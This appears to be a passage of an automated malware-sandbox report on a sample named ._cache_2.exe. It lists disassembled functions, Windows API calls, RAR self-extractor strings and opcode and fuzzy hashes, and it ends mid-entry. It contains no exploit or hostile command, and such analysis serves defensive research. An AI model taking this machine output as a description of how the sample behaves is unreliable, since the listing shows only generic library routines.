                                                                              • GetLastError.KERNEL32(00000000,?,00DD0468,?,00000004,00DD0251,SELECT * FROM Win32_OperatingSystem), ref: 00DE26B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWide$AllocString__alloca_probe_16
                                                                              • String ID:
                                                                              • API String ID: 361600049-0
                                                                              • Opcode ID: 3776d2c94e39e55fc600f33a459ff06c6156f452aa0d0bdcea5521c5ab99c924
                                                                              • Instruction ID: 1ae75aa33e348004173aa53597c21968ff2c9db737003d7f5216c3df40bbf12e
                                                                              • Opcode Fuzzy Hash: 3776d2c94e39e55fc600f33a459ff06c6156f452aa0d0bdcea5521c5ab99c924
                                                                              • Instruction Fuzzy Hash: 5E41C9B1A003459BDB10AF66DC45BBEBBBCEB48760F14822EF505E7290DB759900C7B4
                                                                              Function 00DDCC1D Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,381977BE,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC65
                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC74
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC82
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC90
                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCCAB
                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCCCA
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Time$System$File$Format$DateLocalSpecific
                                                                              • String ID:
                                                                              • API String ID: 909090443-0
                                                                              • Opcode ID: 507edeac2baea93c306574c0070e7d1c60a39a438194f36987cfe467fe7d1a9e
                                                                              • Instruction ID: d7ca9cc70cef4b4155c8c41791a8844a1d27ae67ad223f47f1b7a4ca9d2cae61
                                                                              • Opcode Fuzzy Hash: 507edeac2baea93c306574c0070e7d1c60a39a438194f36987cfe467fe7d1a9e
                                                                              • Instruction Fuzzy Hash: 36310C7650028DABDB24DFA4DC55FEE77ACFB49710F00412AFA06D7281EB749A04CB64
                                                                              Function 00DD7462 Relevance: 9.1, APIs: 6, Instructions: 95timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,-00000B49,?), ref: 00DD74BB
                                                                                • Part of subcall function 00DD011A: GetVersionExW.KERNEL32(?), ref: 00DD014B
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DD74DF
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DD74EF
                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00DD74FE
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD750C
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD751A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                              • String ID:
                                                                              • API String ID: 2092733347-0
                                                                              • Opcode ID: 1d9aacc77b73262a92b9e0505561ba47a20b3147f81e3ae6b3596e8ca97f7b05
                                                                              • Instruction ID: ab30ba7ec7a567b7cee31bdf70490b81f2c1c0db658af03e8609e10e45e4039b
                                                                              • Opcode Fuzzy Hash: 1d9aacc77b73262a92b9e0505561ba47a20b3147f81e3ae6b3596e8ca97f7b05
                                                                              • Instruction Fuzzy Hash: F931EA7590020AEBCB04DFE4D8849EEBBB8FF18314B04552BE515E3710EB34A949CBB5
                                                                              Function 00DE640A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00DE6401,00DE3E5C,00DE3744), ref: 00DE6418
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DE6426
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DE643F
                                                                              • SetLastError.KERNEL32(00000000,00DE6401,00DE3E5C,00DE3744), ref: 00DE6491
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: c531c8d3dc402e05b06595a416d6e7ad61bb1ae3949fdc901fb1e6c34cceb4d0
                                                                              • Instruction ID: f98cf0e43101a7e9129c13b5b3d1b421cfdaaeb261a4d6bb6a4835c46ff477e4
                                                                              • Opcode Fuzzy Hash: c531c8d3dc402e05b06595a416d6e7ad61bb1ae3949fdc901fb1e6c34cceb4d0
                                                                              • Instruction Fuzzy Hash: 1101473210CB926EF7A03777BD8662B2744EB217B8334022EF524A20E1FF52CC489274
                                                                              Function 00DE1016 Relevance: 9.0, APIs: 6, Instructions: 45windowsynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000000,0000000A,00000000,00000000,?,?,?,?,?,00DDE9A6), ref: 00DE1023
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DE103D
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DE104E
                                                                              • TranslateMessage.USER32(?), ref: 00DE1058
                                                                              • DispatchMessageW.USER32(?), ref: 00DE1062
                                                                              • WaitForSingleObject.KERNEL32(00000000,0000000A,?,?,?,?,?,?,00DDE9A6), ref: 00DE106B
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 2148572870-0
                                                                              • Opcode ID: 4e0728e29443992d323b38877a9f214235100482f3f043f91f207fcb55e6303e
                                                                              • Instruction ID: 36ffc3a88b68fe68766b88e495379a6c580e1a31ce90b7c87e1c8adf7aa1616a
                                                                              • Opcode Fuzzy Hash: 4e0728e29443992d323b38877a9f214235100482f3f043f91f207fcb55e6303e
                                                                              • Instruction Fuzzy Hash: CCF031B6A002857BDB206BA69C8DDDB3B7CEBC6711B044025F612E1280DA648449C771
                                                                              Function 00DD0EAE Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 181COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3_
                                                                              • String ID: .rar$exe$rar$sfx
                                                                              • API String ID: 2427045233-630704357
                                                                              • Opcode ID: 4c98a72433298e3c93fc1f06ee4d95936c774333e2c005de9525cd84a4705217
                                                                              • Instruction ID: 1caae8f9254a82cc609f95ecd738e05861d98ff752d002d0823850de2a858768
                                                                              • Opcode Fuzzy Hash: 4c98a72433298e3c93fc1f06ee4d95936c774333e2c005de9525cd84a4705217
                                                                              • Instruction Fuzzy Hash: 04514538A006516ACF29FB74C452BBD7B75EF86B50F14420EF4416B3D2EBA41D82C671
                                                                              Function 00DF028E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • C:\Users\user\Desktop\._cache_2.exe, xrefs: 00DF02AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: C:\Users\user\Desktop\._cache_2.exe
                                                                              • API String ID: 0-2306468991
                                                                              • Opcode ID: 9434f4d34e2a7b0767d5f3d7da6dd5da18d25c803e93b1325c7e51cd0c34c40d
                                                                              • Instruction ID: 3548fc2695bb6caeb7cf2305bd451e0ca6c329f5f9c472a3a135883e06a9e847
                                                                              • Opcode Fuzzy Hash: 9434f4d34e2a7b0767d5f3d7da6dd5da18d25c803e93b1325c7e51cd0c34c40d
                                                                              • Instruction Fuzzy Hash: 5E216D3560034DAF9B20AF618C41D7B7FA9EF0036471AC519FA69DB552EB31ED4087B0
                                                                              Function 00DECC48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,381977BE,?,?,00000000,00DF8950,000000FF,?,00DECC24,?,?,00DECBF8,00000016), ref: 00DECC7D
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DECC8F
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00DF8950,000000FF,?,00DECC24,?,?,00DECBF8,00000016), ref: 00DECCB1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 6a8d0a6ffd5cd8f341650af84e733b858a05e28f63ea44b1909f6f1afdae5ed1
                                                                              • Instruction ID: 84f8dc8205427bca3931caccef4f032cc9c9b4b7abf561b99ead38d624d4a4c4
                                                                              • Opcode Fuzzy Hash: 6a8d0a6ffd5cd8f341650af84e733b858a05e28f63ea44b1909f6f1afdae5ed1
                                                                              • Instruction Fuzzy Hash: B801F231954759AFDB019B51CC08BBEBBB8FB04B25F048526E821E27A0DBB48804CBA0
                                                                              Function 00DD4B72 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00DD6D27: __EH_prolog3_GS.LIBCMT ref: 00DD6D2E
                                                                                • Part of subcall function 00DD6D27: GetSystemDirectoryW.KERNEL32(00000000), ref: 00DD6D59
                                                                                • Part of subcall function 00DD6D27: LoadLibraryW.KERNEL32(00000000,00DD4B85,?,00000104,?,0000005C,00DD4B85,00000000,00DD4D83,00000000,?,?,?,?,00DD4C55,?), ref: 00DD6DB9
                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DD4B91
                                                                              • GetProcAddress.KERNEL32(00E09860,CryptUnprotectMemory), ref: 00DD4BA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$DirectoryH_prolog3_LibraryLoadSystem
                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                              • API String ID: 1852300116-1753850145
                                                                              • Opcode ID: af61e06f2d0ed0ce9c1e6ca24baea6ec04528205bf109bdbbd20e5d955c55124
                                                                              • Instruction ID: 895cacc18ece5221bf291c3cf8f3ebf9206982c5247fdf33f74af5fbbabd0326
                                                                              • Opcode Fuzzy Hash: af61e06f2d0ed0ce9c1e6ca24baea6ec04528205bf109bdbbd20e5d955c55124
                                                                              • Instruction Fuzzy Hash: 66E012709117519FC7305F34A809F52BAD4AB29728B04989EE09AA7790EBB5D4848B70
                                                                              Function 00DCF14A Relevance: 7.6, APIs: 5, Instructions: 131filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCF151
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000003,00000000,00000003,02000000,00000000,00000044,00DCD721,?,?,?,00000024,00DCC784,?,00000001), ref: 00DCF1E0
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000003,00000000,00000003,02000000,00000000,?,00000000,?), ref: 00DCF223
                                                                              • SetFileTime.KERNEL32(?,00000000,00000000,00000000,?,00000000,?), ref: 00DCF2A1
                                                                              • CloseHandle.KERNEL32(?,?,00000000,?), ref: 00DCF2A8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$Create$CloseH_prolog3_HandleTime
                                                                              • String ID:
                                                                              • API String ID: 4002707884-0
                                                                              • Opcode ID: e39146ed5d5da5ac6db9105abfb010a1ca46f08c6443eb04562ac70aded7eff8
                                                                              • Instruction ID: 7d9e00c9c2bdc3831441200c186a53f0b1fbf085a742644df7c884cd5d499553
                                                                              • Opcode Fuzzy Hash: e39146ed5d5da5ac6db9105abfb010a1ca46f08c6443eb04562ac70aded7eff8
                                                                              • Instruction Fuzzy Hash: 1941AC35A4434AAADF25EBB4DC51FEDBB76AF85310F1C412DE451EB2C1DA244A05C738
                                                                              Function 00DD11EE Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DD11F5
                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000034), ref: 00DD121E
                                                                              • GetFullPathNameW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00DD1255
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FullNamePath$H_prolog3_
                                                                              • String ID:
                                                                              • API String ID: 4019068096-0
                                                                              • Opcode ID: 64e186b27ee02993db3442ccfcc783b270644f8a4dff87f34e123e9eb1923e81
                                                                              • Instruction ID: f0b3f814bad1c4ad440c2e5e0542abbc6f5f9f8fe78184eae27919883f68beae
                                                                              • Opcode Fuzzy Hash: 64e186b27ee02993db3442ccfcc783b270644f8a4dff87f34e123e9eb1923e81
                                                                              • Instruction Fuzzy Hash: AB316D38A05226A6DF14F7B0D856FFEBA2AEF56350F58411DB402A3283EF249E06C574
                                                                              Function 00DDC7FF Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 246COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Release$CapsDevice
                                                                              • String ID: ($Pou
                                                                              • API String ID: 4264324914-2564039336
                                                                              • Opcode ID: 743e890f41579f731bc02182c562aa9e9d77736a331810dbcd6f28eae0be6778
                                                                              • Instruction ID: bd11951a51f6ff31813c1da5ec0fb53f1a31b5b35e3d6a380e133fc6d03e3323
                                                                              • Opcode Fuzzy Hash: 743e890f41579f731bc02182c562aa9e9d77736a331810dbcd6f28eae0be6778
                                                                              • Instruction Fuzzy Hash: 849100B56183159FC710DF29D84492ABBE9EFC9B10F10991EF986D3360DB30A905CBA6
                                                                              Function 00DE04EA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000000,?,00000105), ref: 00DE0523
                                                                              • EndDialog.USER32(?,00000001), ref: 00DE07DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: DialogPathTemp
                                                                              • String ID: @set:user$RarSFX
                                                                              • API String ID: 975991991-2180683088
                                                                              • Opcode ID: 648f829356a5cdf4989f0e76144ff4cf249a80452a5a4e0e8ced1dca3373a328
                                                                              • Instruction ID: a7c902c5263c7ec4d132b4ff6fb025494f580de6225d30fb1338b243d6022f2a
                                                                              • Opcode Fuzzy Hash: 648f829356a5cdf4989f0e76144ff4cf249a80452a5a4e0e8ced1dca3373a328
                                                                              • Instruction Fuzzy Hash: AC915B389042A99ADB24FB60CC51BEDBB74AF65300F54419DE84A73193EFB05EC9CA71
                                                                              Function 00DCF3B3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCF3BD
                                                                                • Part of subcall function 00DD7659: GetSystemTime.KERNEL32(?), ref: 00DD7670
                                                                                • Part of subcall function 00DD7659: SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD767E
                                                                                • Part of subcall function 00DD7591: __aulldiv.LIBCMT ref: 00DD759A
                                                                              • __aulldiv.LIBCMT ref: 00DCF3E8
                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,000000A4,00DCC2CD,__tmp_reference_source_,-00000001,00000000,00000000), ref: 00DCF3EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Time$System__aulldiv$CurrentFileH_prolog3_Process
                                                                              • String ID: .rartemp
                                                                              • API String ID: 1329492427-2558811017
                                                                              • Opcode ID: 140e0bc6d0f9562f26c2151d719118b9ac32b300fd8b301ec31dbea84ca0d8c4
                                                                              • Instruction ID: 955dae4ddd48159dae7d9d16c51d77334f653f8729d352870c9c69cdf8373f42
                                                                              • Opcode Fuzzy Hash: 140e0bc6d0f9562f26c2151d719118b9ac32b300fd8b301ec31dbea84ca0d8c4
                                                                              • Instruction Fuzzy Hash: 08316E34A002599ADB18EBA4C852FEDB3B5EF55300F6081ADE059A7192DF705F09CB72
                                                                              Function 00DDDAD3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                              • API String ID: 0-56093855
                                                                              • Opcode ID: 44602fb6543f9caf9aef4fd8b561e6a40465bfca6445088e378e271bfbce74c2
